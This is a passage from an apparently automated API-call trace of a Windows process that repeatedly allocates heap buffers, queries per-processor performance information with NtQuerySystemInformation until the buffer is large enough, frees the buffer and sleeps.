Flags=0x0, Size=0x60) returned 0x285a818 [0251.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0251.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0251.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0251.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0251.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0251.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.521] Sleep (dwMilliseconds=0x110) [0251.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0251.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.536] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0251.536] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0251.536] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.540] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0251.540] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0251.541] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0251.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0251.542] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.542] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0251.542] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.543] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.543] Sleep (dwMilliseconds=0x110) [0251.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0251.946] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0251.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0251.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.952] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0251.952] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0251.952] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0251.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0251.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0251.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0251.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0251.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0251.953] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0251.954] Sleep (dwMilliseconds=0x110) [0252.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0252.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0252.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0252.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0252.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0252.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0252.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0252.020] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0252.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.021] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.021] Sleep (dwMilliseconds=0x110) [0252.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0252.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.037] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0252.037] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0252.037] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0252.038] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0252.038] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.038] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0252.038] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0252.038] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.039] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0252.039] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.039] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.040] Sleep (dwMilliseconds=0x110) [0252.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0252.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.047] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0252.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0252.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0252.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0252.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0252.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0252.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0252.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.049] Sleep (dwMilliseconds=0x110) [0252.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0252.100] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0252.101] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0252.101] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0252.105] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0252.105] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.106] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0252.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0252.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0252.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.108] Sleep (dwMilliseconds=0x110) [0252.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0252.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0252.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0252.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0252.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0252.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0252.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0252.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0252.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.157] Sleep (dwMilliseconds=0x110) [0252.198] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0252.198] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0252.199] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0252.199] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.199] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0252.203] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0252.203] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0252.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0252.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.204] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0252.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.205] Sleep (dwMilliseconds=0x110) [0252.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0252.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.223] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0252.223] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0252.223] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0252.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0252.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.224] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0252.224] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0252.224] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0252.225] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.225] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.225] Sleep (dwMilliseconds=0x110) [0252.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0252.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.238] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0252.238] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0252.238] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0252.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0252.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0252.239] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0252.239] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0252.239] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0252.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0252.240] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0252.240] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0252.240] Sleep (dwMilliseconds=0x110) [0253.130] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0253.131] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.131] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0253.131] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0253.132] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.132] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0253.132] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0253.132] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.133] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0253.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0253.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0253.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0253.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0253.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0253.305] Sleep (dwMilliseconds=0x110) [0253.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0253.692] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.693] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0253.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0253.693] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0253.694] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0253.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.699] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0253.699] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0253.699] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0253.700] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0253.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0253.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0253.702] Sleep (dwMilliseconds=0x110) [0253.934] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0253.934] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.935] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0253.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0253.935] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0253.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0253.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0253.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0253.936] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0253.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0253.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0253.937] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0253.937] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0253.937] Sleep (dwMilliseconds=0x110) [0254.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0254.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) 